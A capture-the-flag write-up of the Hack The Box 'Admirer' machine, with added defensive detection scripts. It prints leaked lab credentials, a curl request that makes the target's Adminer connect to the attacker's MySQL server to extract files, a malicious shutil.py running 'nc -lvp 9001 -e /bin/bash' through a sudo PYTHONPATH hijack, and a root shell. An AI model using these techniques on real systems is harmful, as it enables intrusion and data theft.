Writeup: Admirer
By: Date: 2021-08-10 Categories: CTF,Hack The Box

Admirer is a now-retired box on "Hack The Box" with attack vectors in Web and SQL.

Information gathering

IP of server: 10.10.10.187

Checking the usual suspects revealed a web page on port 80, which led to further enumeration.

Scan

NMAP

Found open ports: 21, 22, 80

# Nmap 7.80 scan initiated Tue Sep  1 18:54:41 2020 as: nmap -p21,22,80 -sC -sV -Pn -oA nmap/admirer --script vuln -vvv 10.10.10.187

Nmap scan report for 10.10.10.187
Host is up, received user-set (0.030s latency).
Scanned at 2020-09-01 18:55:18 CEST for 29s

PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 63 vsftpd 3.0.3
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.25 ((Debian))

| http-enum: 
|_  /robots.txt: Robots file

Contents of robots.txt

robots.txt
User-agent: *

# This folder contains personal contacts and creds, so no one -not even robots- should see it - waldo
Disallow: /admin-dir

Enumeration

Gobuster

To see what might be hidden under /admin-dir, gobuster was used.

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 40 -s 301,302,200,401,403 -u http://10.10.10.187/admin-dir/
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.187/admin-dir/
[+] Threads:        40
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes:   200,301,302,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/09/01 19:59:33 Starting gobuster
===============================================================
/contacts.txt (Status: 200)
/credentials.txt (Status: 200)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/.hta (Status: 403)
===============================================================
2020/09/01 19:59:39 Finished
===============================================================

WFuzz

Another tool that can be used to find the files is WFuzz; the result mostly depends on which wordlist is used.

$ wfuzz -w /usr/share/seclists/Discovery/Web-Content/common.txt --hc=403,404 http://10.10.10.187/admin-dir/FUZZ

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.187/admin-dir/FUZZ
Total requests: 4658

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000001205:   200        29 L     39 W     350 Ch      "contacts.txt"
000001273:   200        11 L     13 W     136 Ch      "credentials.txt"

Findings

Users found in contacts.txt under /admin-dir/

##########
# admins #
##########
# Penny
Email: p.wise@admirer.htb


##############
# developers #
##############
# Rajesh
Email: r.nayyar@admirer.htb

# Amy
Email: a.bialik@admirer.htb

# Leonard
Email: l.galecki@admirer.htb



#############
# designers #
#############
# Howard
Email: h.helberg@admirer.htb

# Bernadette
Email: b.rauch@admirer.htb

Credentials found in credentials.txt under /admin-dir/

[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P

[FTP account]
ftpuser
%n?4Wz}R$tTF7

[Wordpress account]
admin
w0rdpr3ss01!

The FTP account worked on port 21 and allowed downloading a SQL dump and a compressed copy of the site. Extracting the archive reveals an additional folder called "utility-scripts"; requesting the same path on the target shows that its scripts are reachable and can be run:

http://10.10.10.187/utility-scripts/info.php
http://10.10.10.187/utility-scripts/admin_tasks.php

The extracted version also contained the DB credentials:

db_admin.php
<?php
  $servername = "localhost";
  $username = "waldo";
  $password = "Wh3r3_1s_w4ld0?";

Attack

One of the pages (http://10.10.10.187/utility-scripts/adminer.php) exposes the Adminer database tool, which has a known vulnerability (https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool). Exploiting it requires a MySQL server under the attacker's control, so one is set up locally first.

# shell: start the mysql server/service and log in to the management console
sudo systemctl start mysql
sudo mysql

# mysql console: create DB
CREATE DATABASE admirer;

# create user
INSERT INTO mysql.user (User,Host,authentication_string,ssl_cipher,x509_issuer,x509_subject) VALUES('user','%',PASSWORD('password1'),'','','');

# reload the grant tables so the new user becomes active
FLUSH PRIVILEGES;

# change DB
USE admirer;

# fix permissions for the user
GRANT ALL PRIVILEGES ON *.* TO 'user'@'%';

# create test table where all the data will land
create table test(data VARCHAR(255));


# shell: enable remote access to the DB
sudo vim /etc/mysql/mariadb.conf.d/50-server.cnf
# change bind-address from 127.0.0.1 to 0.0.0.0

# restart mysql to activate the changes 
sudo systemctl restart mysql

Once the server is up again, point Adminer at the local DB.

The login form was unreliable at first, but after a direct request with curl:

curl "http://10.10.10.187/utility-scripts/adminer.php?server=10.10.14.16&username=user&db=admirer"

and some manual refreshing of the page, it eventually logs in.

Browsing the interface after login revealed some juicy information:

INSERT INTO `test` (`data`) VALUES
('                        $servername = \"localhost\";'),
('                        $username = \"waldo\";'),
('                        $password = \"&<h5b~yK3F#{PaPB&dA}{H>\";'),
('                        $dbname = \"admirerdb\";');
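From the defender's side, the telltale sign of this technique is the web server's Adminer page being pointed at a database host other than its own (the curl request above carries server=10.10.14.16, the attacker's address). The following detection script is an added example and not part of the original writeup; it parses Apache combined-format access log lines (the sample lines are constructed, not taken from the box) and flags adminer.php requests whose `server` parameter is not a loopback address, noting when that parameter equals the requesting client, which is the pattern seen here.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines in Apache combined format (illustration only).
SAMPLE_LOG = """\
10.10.14.16 - - [01/Sep/2020:20:12:01 +0200] "GET /utility-scripts/adminer.php?server=10.10.14.16&username=user&db=admirer HTTP/1.1" 200 1432 "-" "curl/7.72.0"
10.10.10.5 - - [01/Sep/2020:20:13:44 +0200] "GET /utility-scripts/adminer.php?server=localhost&username=waldo&db=admirerdb HTTP/1.1" 200 1520 "-" "Mozilla/5.0"
10.10.10.5 - - [01/Sep/2020:20:14:02 +0200] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.16 - - [01/Sep/2020:20:15:10 +0200] "POST /utility-scripts/adminer.php?server=evil.example&username=x HTTP/1.1" 403 210 "-" "curl/7.72.0"
"""

# Minimal combined-log parser: client, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

LOCAL_SERVERS = {"localhost", "127.0.0.1", "::1"}


def is_local_server(value):
    """True when the Adminer 'server' value refers to the web host itself."""
    if value in LOCAL_SERVERS:
        return True
    # Strip a single ":port" suffix (IPv4 or hostname); leave IPv6 literals alone.
    host = value.rsplit(":", 1)[0] if value.count(":") == 1 else value
    if host in LOCAL_SERVERS:
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return False


def adminer_external_server_hits(log_text):
    """Return one finding per adminer.php request that names a non-local DB server."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["path"])
        if not url.path.endswith("/adminer.php"):
            continue
        for server in parse_qs(url.query).get("server", []):
            if is_local_server(server):
                continue
            hits.append({
                "src": m["src"],
                "ts": m["ts"],
                "server": server,
                "status": int(m["status"]),
                # The strongest signal: the DB "server" is the client making the request.
                "server_is_requester": server == m["src"],
            })
    return hits


if __name__ == "__main__":
    for hit in adminer_external_server_hits(SAMPLE_LOG):
        print(hit)
```

Only the query string is visible in a standard access log; Adminer also accepts its login fields in the POST body, so the same check needs request-body logging (for example from a web application firewall) to be complete. Independently of logging, egress filtering that prevents the web server from opening outbound MySQL connections to arbitrary hosts removes the technique's precondition entirely.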

The waldo user exists on the box, and it turns out that he reuses passwords: the database password is also his SSH password:

&<h5b~yK3F#{PaPB&dA}{H>

Privilege Escalation

After SSH’ing in as waldo, the user flag is:

waldo@admirer:~$ cat user.txt 
70b98c6e7c3d753017c20f10184ce382

Waldo is also allowed to run a command with sudo:

waldo@admirer:~$ sudo -l
[sudo] password for waldo: 
Matching Defaults entries for waldo on admirer:
    env_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always

User waldo may run the following commands on admirer:
    (ALL) SETENV: /opt/scripts/admin_tasks.sh

The script admin_tasks.sh calls a backup.py script:

backup_web()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Running backup script in the background, it might take a while..."
        /opt/scripts/backup.py &
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}

The backup.py script imports the module "shutil". Because the sudo rule carries the SETENV tag, the caller may pass environment variables such as PYTHONPATH into the root context, and Python searches those directories before the standard library, so the module can be hijacked and replaced with one that suits the attacker's needs.

#!/usr/bin/python3

from shutil import make_archive

src = '/var/www/html/'

# old ftp directory, not used anymore
#dst = '/srv/ftp/html'

dst = '/var/backups/html'

make_archive(dst, 'gztar', src)

Create a folder under /tmp to put the shutil.py file:

mkdir -p /tmp/temp && cd /tmp/temp
vim shutil.py

Contents of shutil.py:

import os
os.system("nc -lvp 9001 -e /bin/bash")

To make Python import the modified shutil.py from the current directory ($PWD), PYTHONPATH is set on the sudo command line, which the SETENV tag permits; argument 6 selects the backup task, as the output shows:

waldo@admirer:/tmp/temp$ sudo -E PYTHONPATH=$(pwd) /opt/scripts/admin_tasks.sh 6
Running backup script in the background, it might take a while...
waldo@admirer:/tmp/temp$ listening on [any] 9001 ...
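Two checks a defender would want for this privilege escalation path, written as an added example rather than code from the box or the writeup: an audit of sudoers text that flags the SETENV tag (and Defaults that preserve the environment), and a guard a privileged Python script such as backup.py could run before importing anything, reporting when PYTHONPATH is set, the interpreter is not in isolated mode (-I), or an import-path entry is writable by the caller. The sudoers fragment is constructed to mirror the sudo -l output above; `hijack_risks`, `sudoers_setenv_findings` and `module_is_stdlib` are names chosen for this example.

```python
import importlib
import os
import re
import sys
import sysconfig

# Constructed sudoers fragment mirroring the box's sudo -l output, plus a hardened line.
SAMPLE_SUDOERS = """\
# constructed example, not the box's real /etc/sudoers
Defaults env_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin, listpw=always
waldo ALL=(ALL) SETENV: /opt/scripts/admin_tasks.sh
# hardened form: same command, no SETENV tag, so sudo's env_reset keeps PYTHONPATH out
waldo ALL=(ALL) /opt/scripts/admin_tasks.sh
"""


def sudoers_setenv_findings(sudoers_text):
    """Flag lines that let a caller inject environment into a privileged command."""
    findings = []
    for lineno, raw in enumerate(sudoers_text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line:
            continue
        if line.startswith("Defaults") and re.search(r"\bsetenv\b|\benv_keep\b", line):
            findings.append((lineno, "Defaults preserves or allows caller environment: " + line))
        elif re.search(r"\bSETENV:", line):
            findings.append((lineno, "SETENV tag allows caller-supplied environment: " + line))
    return findings


def hijack_risks(env, path_entries, isolated, is_writable=lambda p: os.access(p, os.W_OK)):
    """List the conditions under which a module import could be hijacked.

    env          -- environment mapping (os.environ in real use)
    path_entries -- import search path (sys.path in real use)
    isolated     -- whether the interpreter runs with -I (ignores PYTHONPATH and the script dir)
    is_writable  -- predicate for 'this directory is writable by the current user'
    """
    reasons = []
    if not isolated:
        reasons.append("interpreter not in isolated mode (-I): PYTHONPATH and script directory are honoured")
    if "PYTHONPATH" in env:
        reasons.append("PYTHONPATH=%r is set" % env["PYTHONPATH"])
    for entry in path_entries:
        # '' and '.' mean the current directory, which is under the caller's control.
        if entry in ("", ".") or (entry and is_writable(entry)):
            reasons.append("import search path entry %r is writable" % entry)
    return reasons


def current_hijack_risks():
    """Evaluate hijack_risks for the running interpreter."""
    return hijack_risks(os.environ, sys.path, bool(sys.flags.isolated))


def module_is_stdlib(modname):
    """True when the module resolves to a file inside the interpreter's stdlib directory."""
    mod = importlib.import_module(modname)
    path = os.path.realpath(getattr(mod, "__file__", "") or "")
    stdlib = os.path.realpath(sysconfig.get_paths()["stdlib"])
    return path.startswith(stdlib + os.sep)


if __name__ == "__main__":
    for lineno, msg in sudoers_setenv_findings(SAMPLE_SUDOERS):
        print("sudoers line %d: %s" % (lineno, msg))
    for reason in current_hijack_risks():
        print("risk:", reason)
    print("shutil from stdlib:", module_is_stdlib("shutil"))
```

In a privileged script the cheapest fix is the shebang `#!/usr/bin/python3 -I`, which makes the interpreter ignore PYTHONPATH and the script's own directory; removing the SETENV tag from the sudoers rule closes the other half, since env_reset then drops PYTHONPATH before the script starts.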

Root

Because a bind shell is now listening on port 9001, all that is left is to connect with netcat:

$ nc -nv 10.10.10.187 9001
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Connected to 10.10.10.187:9001.
id
uid=0(root) gid=0(root) groups=0(root)

# Upgrade to a more interactive shell/prompt
python -c 'import pty;pty.spawn("/bin/bash")'
root@admirer:/tmp/temp# ls
shutil.py

root@admirer:/tmp/temp# cd /root
root@admirer:/root# ls
root.txt

root@admirer:/root# cat root.txt
42616c7ad960081e92e84a6714880ce1

root@admirer:/root# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:b9:43:24 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.187/24 brd 10.10.10.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:4324/64 scope global mngtmpaddr dynamic 
       valid_lft 85923sec preferred_lft 13923sec
    inet6 fe80::250:56ff:feb9:4324/64 scope link 
       valid_lft forever preferred_lft forever
